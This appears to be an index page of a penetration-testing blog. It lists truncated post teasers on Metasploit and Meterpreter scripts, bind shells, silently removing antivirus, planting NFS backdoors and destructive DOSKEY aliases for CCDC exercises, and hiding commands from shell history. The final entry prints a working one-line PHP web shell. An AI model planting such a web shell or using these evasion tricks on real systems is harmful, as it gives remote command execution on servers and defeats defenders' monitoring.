Rapid fire PSEXEC for Metasploit
Exploit modules inside of metasploit don’t have the ability to run on multiple hosts with one swing of the bat. So I created some code to facilitate that. It’s really not much but there are some really...
Am I an Admin? Railgun Script
When you first step on a machine, you want to determine quickly if you are just a user or an administrator. Meterpreter doesn’t have a way to quickly check this. You could drop to a shell, check the...
Memory Forensics for Pentesters: Part 1
This is part one in a series of presentations I will be giving at the NoVAHackers meetings on forensics of all kinds as it can be leveraged in a penetration test. Memory Forensics for Pentesters:...
Revenge of the Bind Shell
Revenge of the Bind Shell from Practical Exploitation on Vimeo. BACKGROUND At the April 2010 NoVA Hackers meeting I discussed some of the offensive uses of IPv6 on current networks. Well, around that...
Acceptable Questions Checklist
“There is no stupid question” but, if it doesn’t meet this checklist, it’s officially a time wasting one. Acceptable questions checklist: 1. Have I tried it 2. Have I checked the manual, wiki, or forum...
Silently uninstall SEP
Uninstallation is not new. Deleting and removing things on a box you own isn’t new. This method and how to do it remotely was posted in Feb 2007, but I didn’t know how to do it, and I thought it was...
Offensive and Defensive SSH Patching at NoVA Hackers
This is definitely not my content, but I did want to highlight the talk Nicholas [1] gave at NoVA Hackers [2] this last November. Nicholas B. gives a talk about SSH Patching for Offensive and Defense...
Project Honeypot HTTP Blocklist module
Most malicious IP lists focus on the client side threat, where servers (hosted or exploited) host client side exploits or evil scripting. These don’t really help the server admins very much. Project...
Wayback Webapp Hacking
Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that allows you to get a list of every page that Archive.org has for a given domain. This is...
Delicious Webapp Hacking
[UPDATE] This module (enum_delicious) has been pulled from Metasploit since Delicious no longer allows searching by site. In the last post I showed off how Archive.org’s Wayback machine can be used to...
Insider Threat Testing
This day and age everyone is worried about the insider threat. Internal Penetration Testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your...
Patch Adams
Thought I would share this video; if it isn’t a swift kick in the pants to do better with your life, I don’t know what is:
Updated: Password and Word lists
I thought updates went into RSS, but I guess they don’t so this is my “I updated stuff” post: /blog/2009/9/18/password-word-lists/
Cachedump for Meterpreter in action
Update: Cachedump has been added to the Metasploit trunk: https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12946 Pull it down: wget...
Interesting DNS Stuff - SRV Records
The following are good adds to your DNS brute force list: These are all SRV records so make sure your type is set correctly. The great thing about SRV records is that it tells you the port in the...
Metasploit on Wintel Systems
(No I’m not old enough to have used that term when it was the standard) I believe that this tweet should be archived for reference: http://twitter.com/#!/_ming_se/status/37688231185219584 And for those...
Creating Vulnerabilities: NFS Exports
Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap...
Destructive DOSKEY aliases
Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY: C:\Users\vmadmin>doskey /? Edits command lines, recalls Windows commands, and creates...
Issue a Linux command without it going into history
CORRECTION: Thanks to jduck for pointing it out, but you need to actually make a change to get this to work, reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/...
PHP Web Shell
This is mostly for my memory for CCDC: <?php system($_GET['cmd']); ?> I wonder what will happen if a RSS reader doesn’t do proper filtering…